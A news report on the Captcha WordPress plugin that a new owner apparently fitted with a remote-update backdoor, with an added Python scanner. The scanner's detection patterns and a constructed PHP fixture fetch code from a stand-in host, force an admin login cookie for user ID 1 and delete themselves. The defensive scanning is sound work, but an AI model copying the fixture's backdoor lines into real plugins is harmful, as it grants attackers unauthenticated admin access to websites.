Buying popular plugins that have a large user base and then using them for effortless malicious campaigns has become a new trend among bad actors.
One such incident happened recently when the renowned developer BestWebSoft sold its popular Captcha WordPress plugin to an undisclosed buyer, who then modified the plugin to download and install a hidden backdoor.
In a blog post published on Tuesday, the security firm WordFence revealed why WordPress recently kicked the popular Captcha plugin, with more than 300,000 active installations, out of its official plugin store.
While reviewing the source code of the Captcha plugin, WordFence researchers found a severe backdoor that could allow the plugin author, or attackers, to remotely gain administrative access to WordPress websites without any authentication.
The plugin was configured to automatically pull an updated “backdoored” version from a remote URL, https[://]simplywordpress[dot]net/captcha/captcha_pro_update.php, after installation from the official WordPress repository, without the site admin's consent.
This backdoor code was designed to create a login session for the attacker, who in this case is the plugin author, with administrative privileges, allowing them to remotely gain access to any of the 300,000 websites using the plugin without any authentication.
“This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself,” reads the WordFence blog post. “The backdoor installation code is unauthenticated, meaning anyone can trigger it.”
Also, the modified code pulled from the remote server is almost identical to the code in the legitimate plugin repository, so “triggering the same automatic update process removes all file system traces of the backdoor,” making it look as if it was never there and helping the attacker avoid detection.
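As an added defender-side example (not code from this article, WordFence or BestWebSoft), the following Python heuristic flags the three behaviours described above in a plugin's PHP source: a session forced to user ID 1 with authentication cookies, self-deletion, and code fetched from a host other than wordpress.org. The regexes, the two PHP fragments and the host names are constructed assumptions, not WordFence signatures.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Heuristics for the three behaviours described above: a session forced to user ID 1 with
# auth cookies, self-deletion, and code fetched from outside wordpress.org (assumed patterns).
INDICATORS = {
    "forced_admin_session": re.compile(r"wp_set_(?:current_user|auth_cookie)\s*\(\s*1\b"),
    "self_delete": re.compile(r"unlink\s*\(\s*__FILE__\s*\)"),
    "remote_fetch": re.compile(
        r"""(?:file_get_contents|wp_remote_get|curl_init)\s*\(\s*["'](https?://[^"']+)"""),
}

def is_official_host(host: str) -> bool:
    return host == "wordpress.org" or host.endswith(".wordpress.org")  # not 'evilwordpress.org'

def scan_source(source: str) -> list[str]:
    """Return sorted, de-duplicated indicator names found in one PHP source text."""
    findings = set()
    for name, pattern in INDICATORS.items():
        for match in pattern.finditer(source):
            if name == "remote_fetch":
                host = (urlparse(match.group(1)).hostname or "").lower()
                if not is_official_host(host):
                    findings.add(f"{name}:{host}")
            else:
                findings.add(name)
    return sorted(findings)

def risk_level(findings: list[str]) -> str:
    """'high' when the forced admin session and self-delete markers appear together."""
    names = {f.split(":", 1)[0] for f in findings}
    if {"forced_admin_session", "self_delete"} <= names:
        return "high"
    return "review" if names else "clean"

def scan_plugin_dir(root: str) -> dict[str, list[str]]:
    """Map every flagged .php file under root (e.g. wp-content/plugins) to its findings."""
    return {str(p): f for p in Path(root).rglob("*.php")
            if (f := scan_source(p.read_text(errors="ignore")))}

# Constructed fixtures, not real plugin code: a benign update check vs. the described behaviour.
BENIGN_PHP = "<?php $info = wp_remote_get('https://api.wordpress.org/plugins/info/1.0/captcha.json');"
SUSPICIOUS_PHP = """<?php
$update = file_get_contents('https://update-host.invalid/captcha_pro_update.php');
wp_set_auth_cookie(1, true);
unlink(__FILE__);
"""
```

Run scan_plugin_dir('wp-content/plugins') against a copy of the plugins directory and review anything rated high. A clean result does not prove absence of a backdoor, since the post notes that the update mechanism can remove its own traces.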
The reason behind adding the backdoor is unclear at this moment, but if someone pays a handsome amount to buy a popular plugin with a large user base, there must be a strong motive behind it.
In similar cases, we have seen how organized cyber gangs acquire popular plugins and applications to stealthily infect their large user bases with malware, adware, and spyware.
While trying to identify the Captcha plugin buyer, WordFence researchers found that the simplywordpress[dot]net domain serving the backdoor file was registered to someone named “Stacy Wellington” using the email address “scwellington[at]hotmail.co.uk.”
Using a reverse whois lookup, the researchers found a large number of additional domains registered to the same user, including Convert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, and Social Exchange.
What's interesting? All of the above-mentioned domains registered to this user contained the same backdoor code that the WordFence researchers found in Captcha.
WordFence has teamed up with WordPress to patch the affected version of the Captcha plugin and has blocked the author from publishing updates, so website administrators are strongly recommended to replace their plugin with the latest official Captcha version 4.4.5.
WordFence has promised to release in-depth technical details on how the backdoor installation and execution work, along with a proof-of-concept exploit, after 30 days, making sure that admins get enough time to patch their websites.